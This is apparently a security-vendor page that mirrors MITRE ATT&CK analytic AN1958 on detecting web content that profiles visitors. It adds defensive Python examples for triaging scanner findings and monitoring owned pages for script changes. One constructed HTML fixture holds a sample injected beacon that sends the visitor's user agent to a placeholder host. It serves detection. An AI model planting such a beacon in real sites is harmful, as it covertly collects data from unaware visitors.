AN1958: Analytic 1958
Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
Analyst context for executives and security teams
This analytic highlights a difficult pre-compromise detection problem: internet-scale scanning may reveal malicious web content, such as content intended to collect host information from visitors, but the activity can be noisy, common, and often outside the organization’s direct visibility. For leaders, the value is not expecting a clean alert from this analytic alone; it is understanding whether the organization has enough external visibility, threat intelligence context, and incident response linkage to recognize when suspicious infrastructure or watering-hole-style content could become relevant to initial access risk.
Executive priority
Treat this as a visibility and prioritization issue rather than a standalone detection guarantee. Security leaders should ask whether external attack-surface monitoring, threat intelligence review, and SOC escalation paths can connect suspicious web infrastructure findings to business exposure and initial access readiness. Because the ATT&CK description notes high false positives and visibility gaps, budget and audit discussions should focus on evidence quality, triage process, and whether related lifecycle stages are covered.
Technical view
SOC and detection teams should validate how, if at all, they receive evidence from internet scanning, infrastructure research, external threat intelligence, or web-content analysis that identifies patterns associated with malicious content collecting visitor host information. Since no official detection logic is provided and the platform is PRE, teams should avoid treating scanner hits as confirmed malicious activity. Instead, correlate external findings with owned domains, third-party hosted web properties, user reports, web proxy/DNS observations, and any subsequent Initial Access indicators when available.
Likely telemetry
- External threat intelligence or internet scanning results
- Web infrastructure and domain intelligence
- Owned-domain and third-party web asset inventory
- DNS and web proxy logs where available
- Web server or content-change monitoring for organization-controlled sites
Detection direction
- Validate whether findings apply to assets the organization owns, depends on, or exposes to users; otherwise treat them as contextual intelligence.
- Tune triage to account for the high occurrence and false-positive rate noted by ATT&CK.
- Correlate scanner-identified suspicious content with related lifecycle evidence, especially potential Initial Access activity, rather than alerting on pattern matches alone.
- Document visibility gaps where relevant activity occurs outside organizational telemetry.
- Use external references and threat intelligence context to enrich, not automatically confirm, suspicious infrastructure findings.
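The triage flow described in the Technical view and in the bullets above (check asset ownership, check dependency relationships, look for internal users who reached the flagged host, otherwise keep the hit as context) as a worked example. This is added illustration for this page, not ATT&CK content or Glexia tooling; every scanner finding, inventory entry and proxy log line is constructed, and all hostnames are fictional placeholders.

```python
"""
Triage of internet-scanner findings against local asset and proxy context.

Added example for this page; it is not ATT&CK content or Glexia tooling.
Every feed entry, inventory domain and proxy log line below is constructed,
and all hostnames are fictional placeholders.
"""
from urllib.parse import urlparse

# Constructed: URLs an external scanner flagged for a visitor-profiling pattern.
SCANNER_FINDINGS = [
    {"url": "https://news.example-owned.com/index.html", "pattern": "visitor-profiling-js"},
    {"url": "https://cdn.partner-hosted.example/widget.js", "pattern": "visitor-profiling-js"},
    {"url": "https://hr-portal.third-party.example/jobs", "pattern": "visitor-profiling-js"},
    {"url": "https://random-unrelated.example/login", "pattern": "visitor-profiling-js"},
]

# Constructed asset inventory: registrable domains the organization owns, and
# third-party hosts whose content is loaded into the organization's own pages.
OWNED_DOMAINS = {"example-owned.com"}
DEPENDENCY_HOSTS = {"cdn.partner-hosted.example"}

# Constructed web proxy log: epoch client method url status (one request per line).
PROXY_LOG = """\
1700000001 10.0.0.12 GET https://hr-portal.third-party.example/jobs 200
1700000002 10.0.0.12 GET https://hr-portal.third-party.example/jobs/scan.js 200
1700000003 10.0.0.44 GET https://news.example-owned.com/index.html 200
1700000004 10.0.0.44 GET https://www.benign.example/ 200
"""


def host_of(url):
    """Hostname component of a URL, lower-cased; empty string if absent."""
    return (urlparse(url).hostname or "").lower()


def is_owned(host, owned_domains):
    """True if host equals, or is a subdomain of, any owned domain."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in owned_domains for i in range(len(labels)))


def clients_by_host(proxy_log):
    """Map each destination host to the set of internal clients that requested it."""
    visits = {}
    for line in proxy_log.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines rather than abort the triage run
        _ts, client, _method, url, _status = fields
        visits.setdefault(host_of(url), set()).add(client)
    return visits


def triage(findings, owned_domains, dependency_hosts, proxy_log):
    """
    Assign each scanner finding a disposition and priority (1 = most urgent).

    Owned asset        -> the organization's own content may be serving the script.
    Dependency host    -> a third party the organization's pages load code from.
    Seen in proxy logs -> internal users reached it; look for follow-on Initial Access.
    Otherwise          -> keep as contextual intelligence only (the expected noisy case).
    """
    visits = clients_by_host(proxy_log)
    out = []
    for f in findings:
        host = host_of(f["url"])
        clients = sorted(visits.get(host, set()))
        if is_owned(host, owned_domains):
            disposition, priority = "investigate-owned-content", 1
        elif host in dependency_hosts:
            disposition, priority = "investigate-third-party-dependency", 2
        elif clients:
            disposition, priority = "correlate-initial-access", 3
        else:
            disposition, priority = "contextual-intel-only", 4
        out.append({"host": host, "pattern": f["pattern"], "disposition": disposition,
                    "priority": priority, "clients": clients})
    return sorted(out, key=lambda r: r["priority"])


def run_example():
    return triage(SCANNER_FINDINGS, OWNED_DOMAINS, DEPENDENCY_HOSTS, PROXY_LOG)


if __name__ == "__main__":
    for r in run_example():
        print(f"P{r['priority']} {r['disposition']:<36} {r['host']} clients={r['clients']}")
```

The fourth finding never becomes an alert: with no ownership, dependency or proxy evidence it stays at the lowest priority, which is the behaviour the false-positive caveat above calls for. The owned-domain match is suffix-based on DNS labels so that a look-alike such as `example-owned.com.evil.example` is not treated as owned.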
Mitigation priorities
- Maintain an accurate inventory of public-facing and user-facing web assets, including third-party hosted properties where feasible.
- Prioritize monitoring and change-control evidence for organization-controlled web content that could affect visitors.
- Ensure SOC and IR playbooks can escalate credible external intelligence into investigation of related access activity.
- Use threat intelligence and external attack-surface review to prioritize follow-up, while preserving analyst judgment because of expected noise.
- Review coverage for related Initial Access detections since ATT&CK notes this may be a more practical detection focus.
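The "monitoring and change-control evidence for organization-controlled web content" item above, made concrete: fingerprint the script inventory of an owned page (external script URLs plus a SHA-256 of each inline script body) and diff it against a stored baseline, so that an injected profiling script shows up as a new external host or a new inline block. This is an added example for this page and not ATT&CK or Glexia code; both HTML snapshots and all hostnames are constructed, and the allowed-host set stands in for a local policy the organization would maintain.

```python
"""
Content-change monitoring for an organization-controlled page.

Added example for this page, not ATT&CK or Glexia code. The HTML snapshots
and hostnames are constructed; ALLOWED_SCRIPT_HOSTS is an assumed local policy.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline snapshot of an owned page.
BASELINE_HTML = """<html><head>
<script src="https://cdn.partner-hosted.example/widget.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
</head><body><h1>News</h1></body></html>"""

# Constructed later snapshot: two scripts the baseline lacks have appeared.
CURRENT_HTML = """<html><head>
<script src="https://cdn.partner-hosted.example/widget.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
<script src="https://profiler-host.example/s.js" async></script>
<script>var i = new Image(); i.src = "https://profiler-host.example/c?" + encodeURIComponent(navigator.userAgent);</script>
</head><body><h1>News</h1></body></html>"""

# Assumed local policy: third-party hosts this page is expected to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"cdn.partner-hosted.example"}


class ScriptCollector(HTMLParser):
    """Collect external script src values and SHA-256 digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies over as raw data, so they can be hashed as-is.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.add(hashlib.sha256(body.encode("utf-8")).hexdigest())


def fingerprint(html):
    """Script inventory of one page snapshot: external URLs and inline-body digests."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return {"external": frozenset(p.external), "inline": frozenset(p.inline)}


def diff_fingerprints(baseline, current, allowed_hosts):
    """Return (severity, kind, detail) tuples for scripts present now but absent from the baseline."""
    findings = []
    for src in sorted(current["external"] - baseline["external"]):
        host = (urlparse(src).hostname or "").lower()
        # A new script from an unknown third-party host is the watering-hole shape;
        # same-origin (relative src) or allow-listed hosts still get reported, at medium.
        severity = "high" if host and host not in allowed_hosts else "medium"
        findings.append((severity, "new-external-script", src))
    for digest in sorted(current["inline"] - baseline["inline"]):
        findings.append(("medium", "new-inline-script", digest))
    return findings


def run_example():
    return diff_fingerprints(fingerprint(BASELINE_HTML), fingerprint(CURRENT_HTML), ALLOWED_SCRIPT_HOSTS)


if __name__ == "__main__":
    for severity, kind, detail in run_example():
        print(f"{severity:<6} {kind:<20} {detail}")
```

Hashing inline bodies rather than storing them keeps the baseline small and avoids persisting possibly malicious script text, while still distinguishing an edited inline block from an unchanged one. Re-baselining should be tied to the site's own change-control record, otherwise an injected script becomes the new normal on the next run.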
Analyst notes and limits
The supplied ATT&CK object is a detection analytic, not a technique, and provides no official detection logic, tactics, or relationships. The most defensible use is as a prompt to assess external visibility, threat intelligence triage, and correlation with later-stage evidence.
Coverage cannot be inferred from this object alone. The platform is PRE, no tactics are specified, and ATT&CK explicitly notes high false positives and that activity may occur outside target-organization visibility. Local asset ownership, telemetry availability, and investigation context are required.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | acf150cfcf8a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
[2] Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.
[3] mitre-attack. AN1958.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.